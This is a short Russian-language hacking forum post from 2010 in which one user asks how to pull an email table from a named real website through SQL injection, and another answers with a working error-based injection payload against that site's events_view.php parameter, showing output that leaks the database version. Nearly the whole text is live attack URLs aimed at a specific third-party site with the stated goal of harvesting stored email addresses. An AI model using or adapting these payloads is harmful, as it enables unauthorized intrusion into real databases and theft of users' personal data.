28.02.2010, 02:30
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Darren
Доступа в коломс нет, но запрос выполняется -
http://www.parperfecto.com/able/events_view.php?eid=-10+union+select+column_name+from+nformation_Schema .columns%20--
Я знаю что существует таблица email со строкой id и mail но при выполнении такого запроса
http://www.parperfecto.com/able/events_view.php?eid=-10+union+select+mail+from+email%20--
Выводит обычное окно как без запроса, как это можно обойти?
Слепая
_http://www.parperfecto.com/able/events_view.php?eid=10/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)
Код:
Duplicate column name '5.0.77'
|
|
|